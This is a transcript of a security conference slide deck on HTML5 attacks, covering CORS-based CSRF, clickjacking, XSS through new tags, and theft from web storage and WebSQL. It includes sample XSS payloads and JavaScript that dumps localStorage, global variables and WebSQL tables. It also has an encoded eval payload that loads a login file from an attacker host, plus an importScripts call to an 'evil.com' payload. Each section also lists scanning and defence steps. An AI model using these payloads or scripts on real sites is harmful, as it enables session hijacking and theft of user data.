SlideShare a Scribd company logo
HTML5 Hacking
API (Media, Geo etc.) & Messaging Plug-In
Modern Browser Model
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
HTML5 – App Layers
• Presentation
– HTML5 (Tags & Events – new model)
• Process & Logic
– JavaScript, Document Object Model (DOM - 3),
Events, Parsers/Threads etc.
• Network & Access
– XHR – Level 2
– WebSockets
– Plugin-Sockets
• Core Policies
– SOP
– Sandboxing for iframe
– CORS
• CORS/SOP – Data transfer & Origin issues
• Web Messaging – Cross Domain calls
• Web Workers – Domain calls & Logic issues
• LocalStorage – Information leakage & Identity
• Web SQL – Offline & Data theft
• UI/HTML5 – UI Redressing (mixed with CORS)
• DOM/XHR – Several issues
• APIs - Geo-Location, Sockets, Drag-Drop Abuse
Threat Model & HTML5 Components
Attacks - Stealth and Silent …
A1 - CORS Attacks & CSRF
A2 - ClickJacking, CORJacking and UI exploits
A3 - XSS with HTML5 tags, attributes and events
A4 - Web Storage and DOM information extraction
A5 - SQLi & Blind Enumeration
A6 - Web Messaging and Web Workers injections
A7 - DOM based XSS with HTML5 & Messaging
A8 - Third party/Offline HTML Widgets and Gadgets
A9 - Web Sockets and Attacks
A10 - Protocol/Schema/APIs attacks with HTML5
5
API (Media, Geo etc.) & Messaging Plug-In
A1 - CORS Attacks & CSRF
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
HTML5, CORS & XHR
• Before HTML5 – XHR was possible to same
origin only (SOP applicable)
• HTML5 – allows cross origin calls with XHR-
Level 2 calls
• CORS – Cross Origin Resource Sharing needs
to be followed (Option/Preflight calls)
• Adding extra HTTP header (Access-Control-
Allow-Origin and few others)
7
HTTP Headers
• Request
Origin
Access-Control-Request-Method (preflight)
Access-Control-Request-Headers (preflight)
• Response
Access-Control-Allow-Origin
Access-Control-Allow-Credentials
Access-Control-Allow-Expose-Headers
Access-Control-Allow-Max-Age (preflight)
Access-Control-Allow-Allow-Methods (preflight)
Access-Control-Allow-Allow-Headers (preflight)
8
• CSRF++ - powered by XHR-L2
• XML/JSON Cross Domain stream injection
• CORS preflight bypass – content-type
• Internal network scanning and tunneling
• Information harvesting (internal crawling)
• Stealth browser shell – post XSS (Allow origin- *)
• Forcing cookie replay by “withCredentials”
• Business functionality abuse (upload and
streams)
Stealth threats
CSRF with XHR/HTML5
Authentication
Server
Database
Server
Web Store
Application
Server
Login request (HTTPS)
Session cookie
Client/Victim
Browser
User
establishing
Session
CSRF with XHR/HTML5
Authentication
Server
Database
Server
Web Store
Application
Server
Placing an order (JSON services)
Success
Client/Victim
Browser
User making
a buy over
HTTP
Browser
using XHR
Call
JavaScript
CSRF with XHR/HTML5
Authentication
Server
Database
Server
Web Store
Application
Server
Client/Victim
Browser
Session is
still live – not
yet logged
out
Attacker’s
Site
Visit Attacker’s page
Attacker sends CSRF
payload
Leveraging XHR Call
• Content-type to avoid pre flight
• “withCredentials” set to true
CSRF & HTML5
13
CSRF with XHR/HTML5
Authentication
Server
Database
Server
Web Store
Application
Server
XHR initiates HTTP buy request
Success – cookie replayed
Client/Victim
Browser
Attacker’s
Site
Visit Attacker’s page
Attacker sends CSRF
payload
Hence,
• Without victim’s consent or notice
• Stealth HTTP request generated
• Silent Exploitation takes place
Got it
CSRF & HTML5
15
• Powerful XHR-Level 2 call allows file upload on
the fly.
• Interestingly – possible to craft file through
JavaScript and post on the server – if CSRF token
is not there.
• Example, your profile is having a photograph of
yours and you visit attacker site that photo
changes to something else
• More serious threat, exploiting actual business
functionalities...
CSRF/Upload
CSRF with XHR/HTML5
Authentication
Server
Database
Server
Web Store
Application
Server
Uploading bulk orders
Success
Client/Victim
Browser
Business
layer
function of
uploading
Browser is
having Form
(multi-part)
CSRF/Upload - POC
CSRF with XHR/HTML5
Authentication
Server
Database
Server
Web Store
Application
Server
XHR initiates HTTP multi-part - Upload
Success – cookie replayed
Client/Victim
Browser
Attacker’s
Site
Visit Attacker’s page
Attacker sends CSRF
payload
Hence,
• Without victim’s consent or notice
• Stealth HTTP Upload takes place
• Silent Exploitation…
Got it
CSRF/Upload
Internal Scan/Crawl for CORS
• XHR2 – allows full internal scanning capacity
• If internal resource is set to “*” for Access-Control-
Allow-Origin – Game Over!!!
• Attacker can craft a page for box behind firewall, visit
the page – XHR gets loaded and start crawling
internal information with back tunnel
• Harvest and POST back to the server
• All JavaScript – supported by all HTML5 browsers
• Also can be mixed with timing attacks
• Limited crawl – “withCredentials” will not work …
21
Internal Scan/Crawl for CORS
Internal Web/App
Server
Internal Web
Mail
Internal HR
Application
Client/Victim
Browser
Attacker’s
Site
InternetInternet
IntranetIntranet
CSRF Payload
And stealth channel
Internal Scan for CORS
• Scan and look for
– Content-Type checking on server side
– CORS policy scan
– Form and Upload with tokens or not
• Defense and Countermeasures
– Secure libraries for streaming HTML5/Web
2.0 content
– CSRF protections
– Stronger CORS implementation
Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In
A2 - ClickJacking, CORJacking and UI
exploits
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
Click/COR-Jacking
• UI Redressing (Click/Tab/Event Jacking) attack
vectors are popular ways to abuse cross domain
HTTP calls and events.
• HTML5 and RIA applications are having various
different resources like Flash files, Silverlight, video,
audio etc.
• If DOM is forced to change underlying resource on
the fly and replaced by cross origin/domain resource
then it causes Cross Origin Resource Jacking
(CROJacking).
26
• Iframe is having new attributed called sandbox
• It allows frame isolation
• Diabling JavaScript on cross domain while loading
– bypassing frame bursting script
– <iframe src="http://192.168.100.21/"
sandbox="allow-same-origin allow-scripts"
height=“x" width=“x"> - Script will run…
– <iframe src="http://192.168.100.21/"
sandbox="allow-same-origin" height="500"
width="500"> - script will not run – ClickJacking
Sandbox – HTML5
CORJacking
• It is possible to have some integrated attacks
– DOM based XSS
– CSRF
– Flash
• DOM based issue can change flash/swf file – it can
be changed at run time – user will not come to
know ..
• Example
– document.getElementsByName(“login").item(0).src
= "http://evil/login.swf"
CORJacking
• Possible with other types of resources as well
• Also, reverse CORJacking is a possible threat
29
Double eval – eval the eval
• Payload -
document.getElementsByName('Login').ite
m(0).src='http://192.168.100.200:8080/flex/
Loginn/Loginn.swf‘
• Converting for double eval to inject ‘ and “
etc…
– eval(String.fromCharCode(100,111,99,117,109,101,110,116,
46,103,101,116,69,108,101,109,101,110,116,115,66,121,78,
97,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,
109,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47
,49,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,4
8,47,102,108,101,120,47,76,111,103,105,110,110,47,76,111,
103,105,110,110,46,115,119,102,39))
Similar with …
• It is possible to have some integrated attacks
– DOM based XSS
– CSRF
– Silvelight files
• DOM based issue can change xap file – it can be
changed at run time – user will not come to
know ..
• Example
– document.getElementsByName(“login").item(0).src
= "http://evil/login.xap"
• Scan and look for
– ClickJacking defense code scanning
– Using X-FRAME-OPTIONS
• Defense and Countermeasures
– Better control on CORS
– Creating self aware components and loading
after checking the domain
Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In
A3 - XSS with HTML5 tags, attributes
and events
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas
(getImageData), menu, embed,
buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus, sandbox,
manifest, rel etc.
• Events/Objects – Navigation (_self), Editable
content, Drag-Drop APIs, pushState (History)
etc.
34
HTML5 – XSS
• Blacklist and filter will get bypassed
• Lot of new signatures and possible ways to
execute scripts
• XSS can be injected from tags and events
• New attributes are available for XSS payload
35
XSS variants
• Media tags
• Examples
– <video><source onerror="javascript:alert(1)“>
– <video onerror="javascript:alert(1)"><source>
36
XSS variants
• Exploiting autofocus
– <input autofocus onfocus=alert(1)>
– <select autofocus onfocus=alert(1)>
– <textarea autofocus onfocus=alert(1)>
– <keygen autofocus onfocus=alert(1)>
37
XSS variants
• MathML issues
– <math
href="javascript:alert(1)">CLICKME</math>
– <math> <maction
actiontype="statusline#http://Blueinfy.com"
xlink:href="javascript:alert(1)">CLICKME</ma
ction> </math>
38
XSS variants
• Form & Button etc.
– <form id="test" /><button form="test"
formaction="javascript:alert(1)">test
– <form><button
formaction="javascript:alert(1)">test
• Etc … and more …
39
• Scan and look for
– Reflected or Persistent XSS spots with
HTML5 tags
• Defense and Countermeasures
– Have it added on your blacklist
– Standard XSS protections by encoding
Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In
A4 - Web Storage and DOM
information extraction
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
Web Storage Extraction
• Browser has one place to store data – Cookie
(limited and replayed)
• HTML5 – Storage API provided (Local and
Session)
• Can hold global scoped variables
• http://www.w3.org/TR/webstorage/
42
Web Storage Extraction
• It is possible to steal them through XSS or via
JavaScript
• Session hijacking – HttpOnly of no use
• getItem and setItem calls
• XSS the box and scan through storage
Blind storage enumeration
if(localStorage.length){
console.log(localStorage.length)
for(i in localStorage){
console.log(i)
console.log(localStorage.getItem(i));
}
}
• Above code allows all storage variable
extraction
44
DOM Storage
• Applications run with “rich” DOM
• JavaScript sets several variables and
parameters while loading – GLOBALS
• It has sensitive information and what if they
are GLOBAL and remains during the life of
application
• It can be retrieved with XSS
• HTTP request and response are going through
JavaScripts (XHR) – what about those vars?
Password extraction from Ajax/DOM/HTML5 routine
• Here is the line of code
– temp = "login.do?user="+user+"&pwd="+pwd;
xmlhttp.open("GET",temp,true);
xmlhttp.onreadystatechange=function()
Blind Enumeration
for(i in window){
obj=window[i];
try{
if(typeof(obj)=="string"){
console.log(i);
console.log(obj.toString());
}
}catch(ex){}
}
47
Global Sensitive Information Extraction from DOM
• HTML5 apps running on Single DOM
• Having several key global variables, objects
and array
– var arrayGlobals =
['my@email.com',"12141hewvsdr9321343423
mjfdvint","test.com"];
• Post DOM based exploitation possible and
harvesting all these values.
48
Global Sensitive Information Extraction from DOM
for(i in window){
obj=window[i];
if(obj!=null||obj!=undefined)
var type = typeof(obj);
if(type=="object"||type=="string")
{
console.log("Name:"+i)
try{
my=JSON.stringify(obj);
console.log(my)
}catch(ex){}
}
}
49
• Scan and look for
– Scanning storage
• Defense and Countermeasures
– Do not store sensitive information on
localStorage and Globals
– XSS protection
Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In
A5 - SQLi & Blind Enumeration
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
SQL Injection
• WebSQL is part of HTML 5 specification, it
provides SQL database to the browser itself.
• Allows one time data loading and offline
browsing capabilities.
• Causes security concern and potential
injection points.
• Methods and calls are possible
SQL Injection
• Through JavaScript one can harvest entire
local database.
• Example
Blind WebSQL Enumeration
• We need following to exploit
– Database object
– Table structure created on SQLite
– User table on which we need to run select
query
54
Blind WebSQL Enumeration
var dbo;
var table;
var usertable;
for(i in window){
obj = window[i];
try{
if(obj.constructor.name=="Database"){
dbo = obj;
obj.transaction(function(tx){
tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'',
[],function(tx,results){
table=results;
},null);
});
}
}catch(ex){}
}
if(table.rows.length>1)
usertable=table.rows.item(1).name;
55
Blind WebSQL Enumeration
• We will run through all objects and get object
where constructor is “Database”
• We will make Select query directly to
sqlite_master database
• We will grab 1st
table leaving webkit table on
0th
entry
56
Blind WebSQL Enumeration
57
API (Media, Geo etc.) & Messaging Plug-In
A6 - Web Messaging and Web
Workers injections
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
Web Messaging
• HTML5 is having new interframe
communication system called Web
Messaging.
• By postMessage() call parent frame/domain
can call with the iframe
• Iframe can be loaded on cross domain. Hence,
create issues – data/information validation &
data leakage by cross posting possible
59
Web Messaging - Scenario
• If postMessage() is set to * so page can be
loaded in iframe and messaging can be
hijacked
• Also, origin is not set to fixed then again frame
listen from any domian – again an issue
• Stream coming needs to be checked before
innerHTML or eval()
• Iframe or Web Worker can glue two streams –
same domain or cross domain
60
Web Worker – Hacks!
• Web Workers allows threading into HTML
pages using JavaScript
• No need to use JavaScript calls like
setTimeout(), setInterval(), XMLHttpRequest,
and event handlers
• Totally Async and well supported
[initialize] var worker = new Worker('task.js');
[Messaging] worker.postMessage();
61
Web Worker – Hacks!
62
JavaScript Runtime Browser
Platform
Scope and Object – No DOM Access
XHR, Location, Navigator etc.
Regex, Array, JSON etc…
Web Page
Current DOM
Background
Thread on same
page - messaging
Web Worker
Web Worker – Hacks!
• Security issues
– It is not allowing to load cross domain worker
scripts. (http:, https:,javascript:,data : -No)
– It has some typical issues
• It allows the use of XHR. Hence, in-domain and
CORS requests possible
• It can cause DoS – if user get stream to run
JavaScript in worker thread. Don’t have access to
parent DOM though
• Message validation needed – else DOM based
XSS 63
Web Worker – Hacks!
• Exmaple
<html>
<button onclick="Read()">Read Last Message</button>
<button onclick="stop()">Stop</button>
<output id="result"></output>
<script>
function Read() {
worker.postMessage({'cmd': 'read', 'msg': 'last'});
}
function stop() {
worker.postMessage({'cmd': 'stop', 'msg': 'stop it'});
alert("Worker stopped");
}
var worker = new Worker('message.js');
worker.addEventListener('message', function(e) {
document.getElementById('result').innerHTML = e.data;
}, false);
</script>
</html>
64
Web Workers – Hacks!
• Possible to cause XSS
– Running script
– Passing hidden payload
• Also, web workers can help in embedding
silent running js file and can be controlled.
• Can be a tool for payload delivery and control
within browser framework
• importScripts("http://evil.com/payload.js") –
worker can run cross domain script
65
Web Worker – Hacks!
66
• Scan and look for
– JavaScript scanning
– Messaging and Worker implementation
• Defense and Countermeasures
– Same origin listening is a must for messaging
event
Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In
A7 - DOM based XSS with HTML5 &
Messaging
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
DOM with HTML5
DOM based XSS - Messaging
• It is a sleeping giant in the Ajax applications
coupled with Web Messaging
• Root cause
– DOM is already loaded
– Application is single page and DOM remains
same
– New information coming needs to be injected in
using various DOM calls like eval()
– Information is coming from untrusted sources
– JSONP usage
– Web Workers and callbacks
AJAX with HTML5 – DOM
• Ajax function would be making a back-end call
• Back-end would be returning JSON stream or
any other and get injected in DOM
• In some libraries their content type would
allow them to get loaded in browser directly
• In that case bypassing DOM processing…
• Scan and look for
– DOM calls
– Use of eval(), document.* calls etc.
• Defense and Countermeasures
– Secure JavaScript coding
Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In
A8 - Third party/Offline HTML
Widgets and Gadgets
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
Offline Apps
• HTML5 supports caching pages for offline
usage
• <html manifest="/appcache.manifest">
• List of pages gets stored
• Possible to attack and cache poisoning
– Untrusted network or proxy can inject
malicious script
– When you get on to actual app that script gets
executed and keep eye on your activities
74
HTML5 Widgets
• Widgets/Gadgets/Modules – popular with
HTML5 applications
• Small programs runs under browser and using
Web Workers and Messaging
• JavaScript and HTML based components
• In some cases they share same DOM – Yes,
same DOM
• It can cause a cross widget channels and
iframe/sandbox
Cross DOM Access
Widget 1
Email Widget
DOM – Shared DOM
Widget 2
RSS Feed Reader
Widget 3
Attacker
Setting the trap
HTML5 – Web Messaging and Workers
HTML5 - Traps
• It is possible to access DOM events, variables,
logic etc.
• Sandbox is required at the architecture layer
to protect cross widget access
• Segregating DOM by iframe may help
• Flash based widget is having its own issues as
well
• Code analysis of widgets before allowing them
to load
API (Media, Geo etc.) & Messaging Plug-In
A9 - Web Sockets and Attacks
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
Web Sockets
• HTML5 allows Web Socket APIs – full duplex
TCP channel through JavaScript
• Allows cross domain connection like CORS
• Possible threats
– Back door and browser shell
– Quick port scanning
– Botnet and malware can leverage (one to
many connections)
– Sniffer based on Web Socket
79
Internal Scanning
• Allows internal scanning, setting backward
hidden channel, opening calls to proxy/cache.
• Some browsers have blocked these calls for
security reason.
API (Media, Geo etc.) & Messaging Plug-In
A10 - Protocol/Schema/APIs attacks
with HTML5
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network
& Access
Core
Policies
StorageWebSQL
Mobile
Cache
Custom protocol/schema
• HTML5 allows custom protocol and schema
registration
• Example
– navigator.registerProtocolHandler("mailto",
"http://www.foo.com/?uri=%s", “My Mail");
• It is possible to abuse this feature in certain
cases
• Browser follows and gets registered for same
domain though
82
• HTML5 few other APIs are interesting from
security standpoint
– File APIs – allows local file access and can
mixed with ClickJacking and other attacks to
gain client files.
– Drag-Drop APIs – exploiting self XSS and few
other tricks, hijacking cookies …
– Lot more to explore and defend…
APIs …
Conclusion

More Related Content

What's hot

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Shreeraj Shah
 
Html5 on mobile
Html5 on mobileHtml5 on mobile
Html5 on mobile
Blueinfy Solutions
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
Shreeraj Shah
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
Blueinfy Solutions
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
Shreeraj Shah
 
D@W REST security
D@W REST securityD@W REST security
D@W REST security
Gaurav Sharma
 
Application fuzzing
Application fuzzingApplication fuzzing
Application fuzzing
Blueinfy Solutions
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defense
Blueinfy Solutions
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
Aryashree Pritikrishna
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Michael Hendrickx
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
ZIONSECURITY
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
Secure java script-for-developers
Secure java script-for-developersSecure java script-for-developers
Secure java script-for-developers
n|u - The Open Security Community
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
Ahmed Sherif
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack Presentation
Khoa Nguyen
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
Shreeraj Shah
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacks
Mohamed Talaat
 

What's hot (20)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
Html5 on mobile
Html5 on mobileHtml5 on mobile
Html5 on mobile
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
D@W REST security
D@W REST securityD@W REST security
D@W REST security
 
Application fuzzing
Application fuzzingApplication fuzzing
Application fuzzing
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defense
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Secure java script-for-developers
Secure java script-for-developersSecure java script-for-developers
Secure java script-for-developers
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack Presentation
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacks
 

Similar to HTML5 hacking

Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Browser Security
Browser SecurityBrowser Security
Browser Security
Roberto Suggi Liverani
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
Aman Singh
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
robertjd
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
Grupo Gesfor I+D+i
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
Michael Freyberger
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain
Christian Martorella
 
Pentesting web applications
Pentesting web applicationsPentesting web applications
Pentesting web applications
Satish b
 
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
Denard Springle IV
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
Krishna T
 
Burp suite
Burp suiteBurp suite
Burp suite
Yashar Shahinzadeh
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
12 core technologies you should learn, love, and hate to be a 'real' technocrat
12 core technologies you should learn, love, and hate to be a 'real' technocrat12 core technologies you should learn, love, and hate to be a 'real' technocrat
12 core technologies you should learn, love, and hate to be a 'real' technocrat
linoj
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
beched
 
ruxc0n 2012
ruxc0n 2012ruxc0n 2012
ruxc0n 2012
mimeframe
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Shreeraj Shah
 
HTTP protocol and Streams Security
HTTP protocol and Streams SecurityHTTP protocol and Streams Security
HTTP protocol and Streams Security
Blueinfy Solutions
 

Similar to HTML5 hacking (20)

Html5 security
Html5 securityHtml5 security
Html5 security
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain
 
Pentesting web applications
Pentesting web applicationsPentesting web applications
Pentesting web applications
 
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
 
12 core technologies you should learn, love, and hate to be a 'real' technocrat
12 core technologies you should learn, love, and hate to be a 'real' technocrat12 core technologies you should learn, love, and hate to be a 'real' technocrat
12 core technologies you should learn, love, and hate to be a 'real' technocrat
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
ruxc0n 2012
ruxc0n 2012ruxc0n 2012
ruxc0n 2012
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
HTTP protocol and Streams Security
HTTP protocol and Streams SecurityHTTP protocol and Streams Security
